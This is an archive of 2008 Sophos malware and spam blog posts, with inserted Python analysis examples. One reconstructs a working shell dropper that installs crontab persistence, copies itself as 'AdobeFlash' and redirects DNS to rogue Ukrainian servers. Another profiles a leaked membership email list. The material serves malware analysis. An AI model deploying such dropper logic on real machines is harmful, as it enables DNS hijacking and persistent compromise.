Sophos

Archive for November, 2008

Malicious Battlefield

[Battlefield Heroes icon used by the Trojan]

Following on from yesterday’s Pirates of Cape COD blog, we’ve seen more combat-related malware this morning. Not quite such a well-known name this time as the Call of Duty series, but “Battlefield Heroes” is a free-to-play cartoon-style shooter which is currently under development.

[Battlefield Heroes image]

Troj/Bckdr-QQM disguises itself as Battlefield Heroes by using the game’s icon. To the best of my knowledge the full version of the game hasn’t been released yet, so any impatient fans may well think they’ve stumbled across gold. Trigger-happy gamers who run the executable won’t find themselves locked and loaded for battle, though; they’ll instead launch the Trojan, which will attempt to steal MSN login information and connect to several file-sharing websites. Doesn’t sound like much of a fun game, does it?

As ever our advice is to remain vigilant, and remember you can never trust a file’s icon alone. If you’re not 100% sure that a file is from a legitimate source, don’t run it.

* Images courtesy of battlefield-heroes.com


Pirates of Cape COD

[Pirate flag]

A reliable source has informed me that one of the hottest new games these days is “Call of Duty 5”, which retails at 30 pounds per license. However, there exists a website from which one may buy a license for only $10. What a bargain, even if sterling is at its lowest against the dollar in a decade!

The catch is that this “service” is completely illegal. No Somalis on the high seas involved here … well, we do not think so anyway. The site (which has been blocked on our WS1000 web appliance) is fed by a pathetically simplistic, albeit chutzpah-displaying, Trojan called Troj/KeySteal-A, which scouts a computer’s registry for license keys related to “Call of Duty” versions 5 and 4. These stolen keys are then sold on to gamers of low moral rectitude.

The irony of the matter is that the owner of this blatantly illegal website attempts to gain the moral high ground by denouncing those who “pay fraudulently” for the keys.

We urge all to resist the temptation to subscribe to these illegal services. If there is no market for them, these “entrepreneurs” would, perchance, have to actually work for a living.

* Concept image of Call of Duty 5 courtesy of the official Call of Duty website.

** Pirate flag courtesy of current.com.


A Confick of interest

Earlier this week we witnessed the release of a new propagation technique that exploits a recent Microsoft vulnerability in the Windows Server Service. W32/Confick-A uses this security loophole to propagate its malicious DLL across user networks, generally making a real nuisance of itself. However, after talking to some of my colleagues in our Technical Support department, it seems that some users have suffered more pain than they should have at the hands of this worm.

W32/Confick-A (also detected proactively, using Behavioural Genotype technology, as Mal/Conficker-A) is prevented from spreading across the network by our buffer overflow detection technology, which detects the worm’s attack on a running copy of the SVCHost.exe process and prevents execution of the exploit. Other logs received from users show that infection can be prevented at an even earlier stage by HIPS runtime suspicious behaviour detection: HIPS/FileMod-006 has been seen to detect the worm performing one of its first behaviours and to terminate the malicious process before it even attempts to spread.

Of course, such a level of protection can only be achieved with the correct software configuration. Unfortunately, it seems that some users are still running HIPS runtime behaviour detection and buffer overflow protection (BOPS) in the Alert Only setting. In this configuration the malware is detected but not terminated, which is a real shame: had SAV been allowed to take action against this worm using HIPS and BOPS, those users would not have become infected and would not have had to resort to the advanced SAV cleanup IDE.

To close, this incident with W32/Confick-A is yet another reminder of the importance of keeping up to date with security patches. The patch for the vulnerability used by W32/Confick-A was released in October and SophosLabs issued our own advisory and risk assessment shortly afterwards.


Snickerdoodles and FakeAV

Earlier this week we became aware of YAFAT (yet another fake alert trojan family), this time being distributed via drive-by installs from compromised web sites.

Vulnerable sites are having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending links to the malicious web page.

[Keyword stuff page uploaded to legitimate site]

Aside from keywords, the malicious pages also contain a heavily obfuscated JavaScript (detected as Mal/ObfJS-AL). The purpose of the script is to silently redirect the user to another URL (which collects referrer and keyword details), from where they are redirected to the fake alert distribution site.

[Alert box]

[Fake online scan]

The victim is prompted to download and install an executable (install.exe) which is actually a Trojan downloader (detected as Troj/Dloadr-CBA). Take note of the characteristic yellow and black striped icon - I suspect we are going to see a lot of this family over coming weeks.

[Characteristic yellow/black icon]

Once running, install.exe downloads and installs the Winweb Security fake alert malware.

[Winweb Security download]

[Winweb Security fake alert]

Detection for the Winweb Security malware itself has been added as Troj/FakeAV-GX. As with other fake AV families, it is likely that we will see many variants of this family (in fact, as I write this I see we have already started to see some). So, additional generic detection has been added, and will shortly be published (Mal/FakeAV-O).

Finally, the Winweb Security malware is not in any way related to the legitimate firm WinWeb International Limited. Looking at a news item on their site, it would appear some people are making this mistake.


Spam is up by 200%. Rustock botnet revival to blame.

Two weeks ago we wrote about a significant drop in spam volumes caused by the shutdown of McColo hosting. There was no doubt that spam traffic would get back to its previous levels (if not higher) eventually. The question was: when?

Unfortunately, McColo made a brief comeback on November 15th, which gave the Rustock botnet owners enough time to reconfigure the botnet and resume control. It took them less than 10 days to put it back in “business”.

Starting yesterday, the amount of spam reaching our traps has tripled (a 200% increase).

[Chart: spam volume from the Rustock botnet]

Here is an example of a spam campaign it spews: a typical “Canadian Pharmacy” spam brought to you by the “good” guys from the GlavMed affiliate network.

[Rustock spam sample]

The spam volumes haven’t got back to where they were previously, but I don’t think we’ll wait long before publishing an updated graph here.


Facebook, Fake AV and Friends

We’ve seen an increasing number of Facebook worms over recent months, and the last few variants have started to reference other social networking sites, including MySpace. I saw the move to a broader spectrum of targets mirrored when I was investigating the following chain, and it led me to believe there’s a link between these worms and the current plague of “fake anti-virus” (aka “fake AV”) Trojans.

The chain starts off when you receive a message from someone you know in Facebook. The one I saw last week looked like this:

{your friend’s name} sent you a message.

Subject: is it u there?

“WOW
http://www.facebook.com/l.php?u=http://google.com%2Fsearch%3Fq%3Dcache…”

As you can see, the Facebook link is trying to direct you to a page that’s been cached in Google. In this instance Facebook actually knows that this isn’t a site you should be visiting, and displays the following:

[Facebook warning page]

Still, I wanted to know what was there, so I jumped directly to the cached page. At first glance it looked innocuous enough, but closer inspection of the source code showed that the site had been the subject of SQL injection; we detect the injected code as Mal/BadSrc-C. The point of the injection was to redirect visitors silently to another site, and this is what I found there:

[Mal/JSRedir-A script source]

This script (detected by us as Mal/JSRedir-A) uses document.referrer to see which site directed you there, and then passes you on to a different page accordingly. This means that someone sent here after clicking a link in Facebook will end up being shown a different page from someone who clicked the same link in MySpace.

At the moment the sites pointed to all then take you via a 302 redirect to the same payload, but I’d expect to see people being filtered by the page to more targeted code soon. For now the page they point to is of the good old-fashioned “here’s a video, download a codec or software update so you can view it properly” variety. In this instance it’s trying to get you to install flash_update.exe, and the video it’s trying to show you is porn; I’ll visit it from a browser without Flash installed to spare you the gory details:
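The chain described above branches on the referrer and then 302-redirects to a payload page. An analyst mapping such a chain wants every hop recorded rather than silently followed, and wants to compare what a Facebook-referred visitor and a MySpace-referred visitor are sent to. The following is an added example, not Sophos code and not the malware’s own script: a hop-by-hop tracer built on urllib, exercised against a small constructed mock server. The mock branches on the HTTP Referer header instead of client-side JavaScript, and the paths /go, /fb-video, /ms-video, /generic and /flash_update are invented for the demonstration.

```python
"""Trace a referrer-dependent redirect chain hop by hop (added example)."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx responses so each hop surfaces as an HTTPError."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def trace_chain(start_url, referer, max_hops=10):
    """Return the hops [(status, url), ...] reached from start_url.

    Only the first request carries the Referer, mirroring a click on a
    social-networking site; later hops are plain fetches. A non-3xx reply
    ends the chain, as does a 3xx without a Location header or the hop limit.
    """
    opener = urllib.request.build_opener(NoRedirect)
    hops = []
    url = start_url
    headers = {"Referer": referer} if referer else {}
    for _ in range(max_hops):
        req = urllib.request.Request(url, headers=headers)
        try:
            with opener.open(req, timeout=5) as resp:
                hops.append((resp.status, url))
                return hops
        except urllib.error.HTTPError as err:
            hops.append((err.code, url))
            location = err.headers.get("Location")
            if err.code not in REDIRECT_CODES or not location:
                return hops
            url = urljoin(url, location)
            headers = {}
    hops.append(("hop limit", url))
    return hops


class MockRedirector(BaseHTTPRequestHandler):
    """Constructed stand-in for the referrer-branching page and its 302 hops."""

    ROUTES = {"facebook.com": "/fb-video", "myspace.com": "/ms-video"}

    def do_GET(self):
        if self.path == "/go":
            referer = self.headers.get("Referer", "")
            target = "/generic"
            for site, path in self.ROUTES.items():
                if site in referer:
                    target = path
            self._redirect(target)
        elif self.path in ("/fb-video", "/ms-video"):
            # both branches currently lead to the same payload page
            self._redirect("/flash_update")
        else:
            body = b"<html>landing page</html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def _redirect(self, path):
        self.send_response(302)
        self.send_header("Location", path)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock_server():
    """Bind the mock on an ephemeral localhost port and serve in a thread."""
    server = HTTPServer(("127.0.0.1", 0), MockRedirector)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


def compare_referrers(base_url):
    """Trace /go once per referrer; return {referrer: [(status, path), ...]}."""
    chains = {}
    for referer in ("http://www.facebook.com/", "http://www.myspace.com/", ""):
        hops = trace_chain(base_url + "/go", referer)
        chains[referer or "(none)"] = [(code, url[len(base_url):]) for code, url in hops]
    return chains


if __name__ == "__main__":
    server, base = start_mock_server()
    try:
        for referer, chain in compare_referrers(base).items():
            print(f"{referer:28} " + " -> ".join(f"{code} {path}" for code, path in chain))
    finally:
        server.shutdown()
        server.server_close()
```

Against a live chain the same tracer is pointed at the real URL with the mock left out; keeping the hops as data rather than following them lets you diff the Facebook and MySpace paths and spot the moment the branches stop converging on one payload.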

[Fake video page (Mal/VidHtml-A)]

We detect this page as Mal/VidHtml-A and flash_update.exe as W32/Koobfa-Gen. Running that executable gives you the following fake error message (because doing nothing at all would be suspicious):

[Fake error message shown by flash_update.exe]

Meanwhile in the background the worm starts running … and so the cycle begins again.

I promised to tie this together with the fake anti-virus Trojans, and so here goes: if I visit the root domain of the Mal/JSRedir-A page, I get a different variation of the “view this video” page, this one detected as Mal/VidHtml-B:

[Fake video page (Mal/VidHtml-B)]

This page redirects me to another one, detected as Mal/VidHtml-C, which tries to download an executable called setup.exe from yet another remote location. This file is detected as Mal/EncPk-GA, and instead of being a Facebook worm, this is a fake anti-virus Trojan; in fact it’s a component of the Zlob family, which is one of the oldest strains of this phenomenon.

Seeing different types of malware hosted on the same sites isn’t all that uncommon, and we’ve seen instances of quite varied families together. This particular chain incorporates many of the major threats we’ve been seeing recently, allowing us (to some extent) to plot out a better map of who’s responsible for what: in this case, SQL injection, bogus video sites, fake anti-virus software, and Facebook worms. The addition of targets including MySpace, Bebo, hi5, and GeoCities shows the direction these particular malware authors seem to be heading.


New spin on OSX/RSPlug Mac malware

We will soon add detection for a new Mac Trojan, nicely described by Jose Nazario of Arbor Networks. It will be detected as OSX/Jahlav-A. The Trojan comes as a key generator application called MacAccess in a standard DMG disk image file, usually downloaded from a malicious website very similar to the websites hosting variants of the OSX/RSPlug Trojans.

[MacAccess disk image]

The difference is that this time the malware does not simply redirect the DNS settings to a rogue DNS server but connects to an IP address located in the Netherlands to download an additional piece of code and execute it.

Two identical files inside the DMG file, preinstall and preupgrade, are standard Unix shell scripts that contain additional uuencoded payloads. When decoded, the first layer is another shell script that sets up a cron job to run the file AdobeFlash in the “/Library/Internet Plug-Ins” directory. This file is a copy of the initial preinstall/preupgrade scripts.

[preinstall script with uuencoded payload]

Initially, I thought that the downloading functionality could be used to recruit the infected Mac into a botnet, but the downloaded code’s functionality is identical to previous OSX/RSPlug variants. The additional piece of code is another uuencoded and slightly obfuscated shell script that eventually changes the local DNS settings to point to a couple of rogue DNS servers located in Ukraine, using IP addresses 85.255.112.6 and 85.255.112.127.
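The layered structure described in the two paragraphs above (a shell script carrying a uuencoded payload that decodes to another script, which sets up the cron job and eventually changes the DNS settings) is exactly what an analyst has to peel apart. The following is an added example, not Sophos code and not the OSX/Jahlav-A sample itself: it decodes every begin/end block with binascii, recurses into the result, and reports per layer the indicators the post mentions (crontab use, the AdobeFlash file under /Library/Internet Plug-Ins, and the rogue addresses 85.255.112.6 and 85.255.112.127). The sample dropper is constructed here; the `networksetup -setdnsservers` line in it is an assumption about how a script might change DNS settings, not something taken from the real sample.

```python
"""Peel uuencoded layers out of a shell-script dropper and flag behaviour (added example)."""
import binascii
import re

ROGUE_DNS = ("85.255.112.6", "85.255.112.127")

# label -> pattern that identifies the behaviour in decoded script text
INDICATORS = {
    "cron job installed": re.compile(r"\bcrontab\b"),
    "AdobeFlash dropped in Internet Plug-Ins":
        re.compile(r"/Library/Internet Plug-Ins/AdobeFlash"),
    "DNS settings changed": re.compile(r"networksetup\s+-setdnsservers|resolv\.conf"),
}

BEGIN_LINE = re.compile(r"^begin \d{3} \S+")


def decode_uu_blocks(text):
    """Return the decoded bytes of every 'begin <mode> <name>' ... 'end' block."""
    payloads = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        if BEGIN_LINE.match(lines[i]):
            chunks = []
            i += 1
            while i < len(lines) and lines[i].strip() != "end":
                line = lines[i]
                # a bare backtick is the zero-length terminator line; skip blanks too
                if line and line != "`":
                    chunks.append(binascii.a2b_uu(line))
                i += 1
            payloads.append(b"".join(chunks))
        i += 1
    return payloads


def analyse(script_text, depth=0, max_depth=5):
    """Return [(layer, finding), ...] for this script and every embedded layer."""
    findings = []
    for label, pattern in INDICATORS.items():
        if pattern.search(script_text):
            findings.append((depth, label))
    for ip in ROGUE_DNS:
        if ip in script_text:
            findings.append((depth, f"rogue DNS server {ip}"))
    if depth < max_depth:
        for payload in decode_uu_blocks(script_text):
            inner = payload.decode("utf-8", errors="replace")
            findings.extend(analyse(inner, depth + 1, max_depth))
    return findings


def uuencode(data, name):
    """Produce a classic uuencoded block (used here only to build the sample)."""
    lines = [f"begin 644 {name}"]
    for offset in range(0, len(data), 45):
        chunk = data[offset:offset + 45]
        lines.append(binascii.b2a_uu(chunk).decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return "\n".join(lines)


def build_sample():
    """Constructed three-layer dropper shaped like the one described in the post."""
    stage2 = (
        "#!/bin/sh\n"
        "# innermost layer: DNS hijack (this command line is an assumption)\n"
        f"networksetup -setdnsservers Ethernet {ROGUE_DNS[0]} {ROGUE_DNS[1]}\n"
    )
    stage1 = (
        "#!/bin/sh\n"
        "# middle layer: persist through cron and keep a copy of itself\n"
        'cp "$0" "/Library/Internet Plug-Ins/AdobeFlash"\n'
        "echo '*/5 * * * * \"/Library/Internet Plug-Ins/AdobeFlash\"' | crontab -\n"
        + uuencode(stage2.encode(), "stage2") + "\n"
    )
    return (
        "#!/bin/sh\n"
        "# outer layer (preinstall): unpack the embedded script and run it\n"
        'uudecode -o /tmp/stage1 "$0" && sh /tmp/stage1\n'
        + uuencode(stage1.encode(), "stage1") + "\n"
    )


if __name__ == "__main__":
    for layer, finding in analyse(build_sample()):
        print(f"layer {layer}: {finding}")
```

Nothing in the decoded layers is executed; the tool only decodes and pattern-matches, so it is safe to run over a real sample. The uuencode alphabet contains no lowercase letters, which is why a `begin` line or the word `crontab` can never be matched by accident inside an encoded block: each finding is attributed to the layer where the plaintext actually lives.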

The new sample is one of several we have been seeing lately and shows that the Zlob gang is still very interested in infecting Macs.


Spam is down for most but will go up for some

As we have been saying on our blog recently, spam volumes have been down for some. Others may be seeing an increase in spam, though, especially those individuals and companies whose contact details were published to various internet sites last week as part of the leak of BNP party membership lists.

The list currently hosted by Wikileaks contains 6131 entries with associated email addresses. Of those 6131 there are 5959 unique email addresses, most of which are either free or associated with ISPs.

[Pie chart of email address providers]

In the chart I have tried to amalgamate addresses into groups, e.g. Virgin = {Virgin, Ntlworld, blueyonder} etc. This was based on the first part of the domain.

Surprisingly, some of the email addresses seem to be individuals’ company addresses, which may break their companies’ acceptable use policies. As has been noted in the news media, the list contains some interesting occupations; analysing the email addresses also gives some interesting results:

  • 17 gov.uk
  • 15 ac.uk
  • 9 sales@
  • 5 .de (TLD of Germany)
  • 1 .za (TLD of South Africa)
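The grouping behind the chart (first label of the domain, with known aliases merged) and the counts in the list above are a small data-triage job that is worth having as a script when a leak like this surfaces. This is an added example, not Sophos code: it reproduces that analysis on a constructed sample list, with no addresses from the real leak; the alias entries beyond the post’s Virgin example are assumptions.

```python
"""Group a leaked address list by provider and tally notable categories (added example)."""
from collections import Counter

# first label of the domain -> provider group (Virgin from the post; the rest assumed)
PROVIDER_ALIASES = {
    "virgin": "Virgin", "ntlworld": "Virgin", "blueyonder": "Virgin",
    "btinternet": "BT", "btopenworld": "BT",
    "gmail": "Google", "googlemail": "Google",
}

# treated as home TLDs; anything else is reported as a foreign TLD
HOME_TLDS = {"uk", "com", "net", "org"}

SAMPLE_ADDRESSES = [  # constructed, with one duplicate and two junk entries
    "alice@ntlworld.com", "bob@blueyonder.co.uk", "carol@virgin.net",
    "dave@btinternet.com", "erin@hotmail.co.uk", "frank@gmail.com",
    "sales@example-widgets.co.uk", "grace@somecouncil.gov.uk",
    "heidi@someuni.ac.uk", "ivan@example.de", "judy@example.co.za",
    "Alice@NTLWORLD.com", "not an address", "",
]


def normalise(address):
    """Lower-case and split into (local, domain); None for malformed entries."""
    address = address.strip().lower()
    if address.count("@") != 1:
        return None
    local, domain = address.split("@")
    if not local or "." not in domain:
        return None
    return local, domain


def provider_group(domain):
    """Map a domain to its provider group by its first label, merging aliases."""
    first = domain.split(".")[0]
    return PROVIDER_ALIASES.get(first, first.capitalize())


def summarise(addresses):
    """Return entry/unique counts, per-provider counts and the notable categories."""
    unique = {parsed for parsed in map(normalise, addresses) if parsed}
    groups = Counter(provider_group(domain) for _, domain in unique)
    categories = Counter()
    for local, domain in unique:
        if domain == "gov.uk" or domain.endswith(".gov.uk"):
            categories["gov.uk"] += 1
        if domain == "ac.uk" or domain.endswith(".ac.uk"):
            categories["ac.uk"] += 1
        if local == "sales":
            categories["sales@"] += 1
        tld = domain.rsplit(".", 1)[-1]
        if tld not in HOME_TLDS:
            categories["." + tld] += 1
    return {"entries": len(addresses), "unique": len(unique),
            "groups": groups, "categories": categories}


if __name__ == "__main__":
    report = summarise(SAMPLE_ADDRESSES)
    print(f"{report['entries']} entries, {report['unique']} unique addresses")
    for group, count in report["groups"].most_common():
        print(f"  {count:3} {group}")
    for label, count in sorted(report["categories"].items()):
        print(f"  {count:3} {label}")
```

Deduplicating after lower-casing is what turns the raw entry count into the unique-address count the post quotes, and the provider grouping is deliberately crude (first label only), matching the method the chart used rather than a full public-suffix lookup.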

Rumour has it that the person(s) who leaked this information added some details spuriously.

The email addresses listed will undoubtedly be added to spammers’ lists. Those mentioned in the list should look to upgrade their anti-spam software; then again, this is the least of their worries.


McColo shutdown lightens malware load

Not only has the takedown of McColo last week caused a massive drop in worldwide spam levels, but it would also appear to have resulted in a big drop in the level of malware being spammed out as attachments.

Up until last week, we at SophosLabs had seen something of a resurgence in malware as an attachment in recent months, with huge numbers of malicious attachments from various malware families appearing on our spam traps, such as W32/Autorun-OG posing as fake UPS details, Troj/Agent-ICH as a fake eCard, and Troj/Agent-HQK and Troj/Agent-IDO as bogus internet access suspension details.

However, over the last week we have been seeing just the usual background radiation of W32/MyDoom, W32/Mytob and W32/NetSky variants.

[Chart: malware attachments seen on our spam traps]

It is unlikely that things will stay this quiet for long but we at SophosLabs appreciate the relative calm while it lasts.


Phishing gangs capitalize on upcoming UK government tax breaks

This Saturday started quietly as expected, so I had a chance to look at the BBC news headlines. One of today’s headlines indicates that the UK Chancellor, Alistair Darling, is spending the weekend adding the finishing touches to a package of tax cuts and increased public spending that should help the economy get out of the recession as soon as possible.

Going back to analyse some of the latest spam messages I came across this message, quite obviously not written by anybody from the government:

[Directgov phishing email]

It is interesting to see how quickly phishing gangs, though admittedly not very skilfully, are catching up on the latest news. The recession has a definite impact on the type of spam messages we are seeing. Out with unique opportunities to make money from manipulating the values of penny stocks, in with helping people of my age group to cope with the difficulties of the credit crunch.

Following the link in the email lands the browser on a page somewhat unusual for phishing. The “government” wants to know more about me to determine how big a tax return I can get. It seems that men aged 31-35 are not included in this government giveaway, which I find quite disappointing. This page could either be used to collect more information for identity theft, or simply to make the page look a bit more legitimate, which I think is more likely in this case.

[Phishing form page]

When I briefly looked at the page source code, to make sure that there were no nasty surprises in the form of malicious JavaScript code, I could immediately see that the page had been adapted in a rush from at least two other phishing kits. The first indicator is the page title “Robobank - Complete” (a misspelling of Rabobank). Further down in the HTML source, the style sheet is taken from another phishing target, The Farmers and Merchants Bank of Central California. Finally, the page footer contains the link to the corporate information page of Rabobank Americas.

If this phishing gang wants a higher return on their emails, they will have to improve the quality of their pages. They can still consider themselves the trend-setters in the genre of government phishing, despite their unskilful work.